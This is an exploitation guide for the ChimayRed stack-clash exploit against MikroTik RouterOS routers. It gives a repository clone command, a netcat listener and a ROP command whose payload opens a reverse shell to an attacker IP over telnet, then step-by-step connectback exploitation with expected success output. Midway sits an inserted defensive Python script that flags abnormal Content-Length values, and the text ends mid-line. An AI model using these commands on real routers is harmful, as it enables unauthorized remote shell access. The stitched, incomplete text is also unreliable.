The author does not hold any responsibility for the bad use of this script. Remember that attacking targets without prior consent is illegal and punishable by law; this script was built to show how resource files can automate tasks.
ChimayRed (CR) is an exploit that is used against MikroTik (MT) routers running RouterOS. It is used to upload a payload such as HIVE or TinyShell onto the MT router. This guide explains how to utilize ChimayRed to upload the TinyShell payload to the MikroTik router.
+ Python 2.7.x
What really happens?
+ The content_length_value is subtracted from the stack pointer register.
+ If we pass a number larger than 130000 and smaller than 2147483647, the stack pointer will point outside the stack, and the first PUSH will generate a SEGFAULT.
+ If we pass a negative number (or a number from 2147483648 [-2147483648] to 4294967295 [-1]), the space on the stack won’t be reserved because the stack pointer will be incremented instead of decremented.
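For defenders, the ranges above translate directly into a check that a reverse proxy or log pipeline can apply to the Content-Length header before a request reaches the router's web server. The Python below is an added example, not code from the original page or from the Chimay-Red project; the 130000 threshold is the figure quoted above, and the function names, category labels and sample requests are constructed for illustration.

```python
import re

STACK_LIMIT = 130000        # threshold quoted on this page
INT32_MAX = 2147483647
UINT32_MAX = 4294967295
HEADER_RE = re.compile(rb"^content-length[ \t]*:(.*)$", re.I | re.M)

def to_int32(value):
    """Reinterpret a value as a signed 32-bit two's-complement integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value > INT32_MAX else value

def classify_content_length(raw):
    """Map one Content-Length value onto the cases listed above."""
    raw = raw.strip()
    if not re.fullmatch(r"[+-]?[0-9]+", raw):
        return "malformed"
    value = int(raw)
    if value > UINT32_MAX or value < -INT32_MAX - 1:
        return "outside-32bit"
    signed = to_int32(value)
    if signed < 0:
        return "negative"    # stack pointer incremented, no space reserved
    if signed > STACK_LIMIT:
        return "oversized"   # stack pointer moved outside the stack
    return "ok"

def scan_request(head):
    """Classify every Content-Length header found in a raw request head."""
    header_block = head.split(b"\r\n\r\n", 1)[0]
    return [classify_content_length(m.group(1).decode("latin-1"))
            for m in HEADER_RE.finditer(header_block)]

# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": b"POST / HTTP/1.1\r\nHost: router\r\nContent-Length: 42\r\n\r\n",
    "big": b"POST / HTTP/1.1\r\nContent-Length: 200000\r\n\r\n",
    "wrap": b"POST / HTTP/1.1\r\ncontent-length: 4294967295\r\n\r\n",
    "minus": b"POST / HTTP/1.1\r\nContent-Length: -1\r\n\r\n",
}

if __name__ == "__main__":
    for name, head in SAMPLES.items():
        print(name, scan_request(head))
```

Any result other than `ok` is worth logging and rejecting at the proxy, since no legitimate request to a router's web interface needs such a value.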
    git clone https://github.com/BigNerd95/Chimay-Red && cd Chimay-Red

Where:
+ RouterOS IP: 192.168.1.1
+ PC IP: 192.168.1.5

    nc -l -p 1234
    ./StackClashROPsystem.py 192.168.1.1 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.1.5 1234 < /ram/f | /bin/bash > /ram/f 2>&1"

or

Step-by-step guide
1. Verify that the MikroTik is running RouterOS 6.X
2. Verify that Python version 2.7 is installed
3. Determine the ICON IP Address
4. Go to the ChimayRed bin directory
   a. /home/ubuntu/Desktop/ChimayRed_v3.7/bin
5. Exploit RB 493G using ChimayRed.
   a. python chimay_red.py -t 172.20.100.6:80 connectback -l 172.20.12.23 -p 4242
6. The following output should be observed, which confirms successful exploitation:
   a. [+] Connecting to: 172.20.100.6:80
   b. [+] Detected RouterOS: 6.27
   c. [+] Detected architecture: mipsbe
   d. [+] 0 seconds until Web server is reset.
   e. [+] Web server reset.
   f. [+] Connecting to